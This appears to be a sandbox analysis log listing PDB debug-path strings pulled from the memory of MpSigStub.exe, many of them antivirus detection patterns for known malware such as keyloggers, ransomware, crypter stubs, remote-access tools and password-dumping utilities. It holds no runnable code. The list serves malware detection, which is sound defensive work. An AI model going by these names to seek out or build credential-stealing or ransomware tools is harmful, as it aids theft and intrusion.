Source:	Binary string: dxtrans.pdb source: MpSigStub.exe, 00000026.00000003.18290876432.00000138BE187000.00000004.00000001.sdmp
Source:	Binary string: c:\supply\trouble\Classwho.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdb source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: fc.pdb0 source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp
Source:	Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: 4\ValhallaCrypter\ValhallaStub\Debug\ValhallaStub.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: EFRE65.pdb source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: C>s:\\dEVELOPMdNT\\dC\+\+dCdyptordEvoldtiod_dld\\release\\m.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: lIFdrGkmBePss.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: CryARr.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: zYAamTGB2rfW!Cp+aR.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: D:\program z visuala\keylogger\Release\keylogger.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: SAVService.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: 7laIR+\|.XJ5aA0aa.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: wevtutil.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: \Ransomware2.0.pdb source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp
Source:	Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.\\.\\EncryptFile.exe.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp
Source:	Binary string: megasync.pdb source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: (vbsedit_source\x64\Release\mywscript.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: kernel32.pdb source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: winscard.pdb source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: stscast.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdb source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp
Source:	Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: Z:\\Work\\Make Troy\\Concealment Troy\\Exe_Concealment_Troy$Winlogon_Shell$\\.*.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: security.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdbaT source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb3 source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: :\cef_2883\chromium_git\chromium\src\out\Release_GN_x86\vmxclient.exe.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp
Source:	Binary string: nafde.pdb source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: autofmt.pdb source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp
Source:	Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp
Source:	Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: PassView.pdb source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb] source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp
Source:	Binary string: dsquery.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp
Source:	Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp
Source:	Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: obj\Debug\WinCalendar.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: subst.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
Source:	Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp
Source:	Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
Source:	Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp
Source:	Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: KSLD.pdb source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: cryptdll.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: reg.pdbd source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp
Source:	Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: .+:\\.+\\.Pedro\\.PH_Secret_Application.\\PH_Secret_Application.\\.+\\Release\\.*.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: !6zyA6@267=HPS.C\|dMqd4-qaN\|yjm.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: @.pdb source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp
Source:	Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp
Source:	Binary string: vssadmin.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp
Source:	Binary string: msnetobj.pdb3 source: MpSigStub.exe, 00000026.00000003.18332878772.00000138BD2D2000.00000004.00000001.sdmp
Source:	Binary string: \Release\Cloudy.pdb] source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
Source:	Binary string: lsasrv.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdb source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: PELoader.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: _darkshell\i386\DarkShell.pdb] source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: d:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: \Release\ProtectedService.pdb source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb` source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp
Source:	Binary string: \Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: F:\rdpscan\Bin\Release_logged\x64\rdpscan.pdb source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp
Source:	Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: 4G:\Work\Bison\BisonNewHNStubDll\Release\Goopdate.pdb] source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \FARATCLIENT\obj\Debug\FARATCLIENT.pdb source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: hal.pdb source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp
Source:	Binary string: JOe\|OBzjATck#psb/.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \mspass.pdb source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp
Source:	Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: 3.C:\\Obnubilate\\Temp\\[a-z0-9]{26}\\Stub\.pdb source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp
Source:	Binary string: Release\adviser.pdb source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp
Source:	Binary string: <7\\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: iashlpr.pdb source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp
Source:	Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: ZAService.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: gMolq.pdb source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp
Source:	Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: rStub\LimitlessLoggerStub\obj\x86\Debug\LLS.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
Source:	Binary string: fk_drv.pdb] source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: RamMap.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
